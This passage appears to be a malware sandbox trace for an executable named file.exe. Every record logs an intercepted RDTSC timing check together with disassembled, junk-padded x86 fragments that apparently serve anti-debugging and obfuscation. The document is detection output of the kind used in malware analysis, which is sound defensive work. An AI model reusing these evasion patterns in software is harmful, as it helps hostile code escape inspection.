Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4787 second address: 8D478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4B7E second address: 8D4B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4B83 second address: 8D4B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4B89 second address: 8D4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jnl 00007F8481503866h 0x0000000f pop ebx 0x00000010 jmp 00007F8481503877h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F848150386Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4CFD second address: 8D4D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4D03 second address: 8D4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4D09 second address: 8D4D13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F848074392Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C8BCF second address: 8C8BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5563 second address: 8D556E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5B55 second address: 8D5B8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 jmp 00007F8481503873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5B8A second address: 8D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5B8E second address: 8D5B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DA115 second address: 8DA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DAF6F second address: 8DAF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DC8E5 second address: 8DC8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DC8F3 second address: 8DC8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1203 second address: 8E1207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1207 second address: 8E1210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1210 second address: 8E121E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E121E second address: 8E1222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1222 second address: 8E1228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1228 second address: 8E1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503879h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1247 second address: 8E1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1968 second address: 8E1993 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8481503866h 0x00000008 jnc 00007F8481503866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F8481503878h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1993 second address: 8E1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1ADC second address: 8E1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Bh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3D73 second address: 8E3D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3D7A second address: 8E3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3D87 second address: 8E3D9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3D9B second address: 8E3DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3DA2 second address: 8E3DC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8480743926h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jmp 00007F848074392Ch 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E42A2 second address: 8E42C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8481503873h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4B9B second address: 8E4B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4B9F second address: 8E4BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4C86 second address: 8E4CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F8480743926h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4CA4 second address: 8E4CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E561D second address: 8E563E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480743935h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E80CC second address: 8E80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E8705 second address: 8E8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E91B2 second address: 8E91CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8481503871h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E9C68 second address: 8E9C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EA72D second address: 8EA731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EBC6D second address: 8EBC77 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ED745 second address: 8ED74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EC4CA second address: 8EC4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ED8BC second address: 8ED8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8481503866h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EE6A8 second address: 8EE6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF65C second address: 8EF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EE7EB second address: 8EE800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF660 second address: 8EF669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF669 second address: 8EF66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF66F second address: 8EF6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8481503868h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2A4Ch], eax 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D3560h], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F8481503868h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jmp 00007F848150386Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F8481503868h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF6DD second address: 8EF6E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF862 second address: 8EF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F07F7 second address: 8F07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F1627 second address: 8F162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F162D second address: 8F1631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F26BC second address: 8F26DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F848150386Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jo 00007F8481503866h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F26DC second address: 8F26E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F4808 second address: 8F480C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6915 second address: 8F6919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6919 second address: 8F6923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6923 second address: 8F6927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6927 second address: 8F692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F692D second address: 8F6977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F8480743936h 0x00000011 jmp 00007F848074392Eh 0x00000016 pop edx 0x00000017 jmp 00007F848074392Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AB066 second address: 8AB07B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6FC5 second address: 8F7021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F8480743926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F8480743936h 0x00000014 nop 0x00000015 mov edi, esi 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D1E69h] 0x0000001f jmp 00007F8480743937h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D3630h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e je 00007F8480743928h 0x00000034 push esi 0x00000035 pop esi 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F7021 second address: 8F702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F8F2F second address: 8F8F4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F848074392Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FADA5 second address: 8FADA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FADA9 second address: 8FADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074392Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FADB7 second address: 8FAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F8481503868h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8481503868h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D19FDh], ebx 0x00000042 push 00000000h 0x00000044 xor dword ptr [ebp+122D26B0h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jmp 00007F8481503876h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F815B second address: 8F81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F848074392Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F8480743928h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push dword ptr fs:[00000000h] 0x0000003a adc ebx, 6B697BA1h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov dword ptr [ebp+122D1EF2h], ebx 0x0000004d mov eax, dword ptr [ebp+122D156Dh] 0x00000053 mov edi, dword ptr [ebp+122D1BD2h] 0x00000059 push FFFFFFFFh 0x0000005b jmp 00007F848074392Dh 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FA004 second address: 8FA008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FAF86 second address: 8FAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FAF8B second address: 8FAF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FCD7C second address: 8FCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FCD85 second address: 8FCD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FCD89 second address: 8FCE12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8480743928h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, edx 0x00000029 push 00000000h 0x0000002b mov edi, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8480743928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 sub ebx, dword ptr [ebp+122D382Ch] 0x0000004f jg 00007F848074392Dh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F848074392Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FAF90 second address: 8FB029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007F848150386Eh 0x00000013 pop eax 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1EE1h], ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr [ebp+12466B3Eh], eax 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F8481503868h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 sbb bx, 36FEh 0x0000004e mov eax, dword ptr [ebp+122D0199h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007F8481503868h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e push FFFFFFFFh 0x00000070 and edi, 0708B497h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB029 second address: 8FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB02D second address: 8FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB033 second address: 8FB03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FBF5F second address: 8FBF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503871h 0x00000009 popad 0x0000000a jmp 00007F848150386Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FBF8B second address: 8FBF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
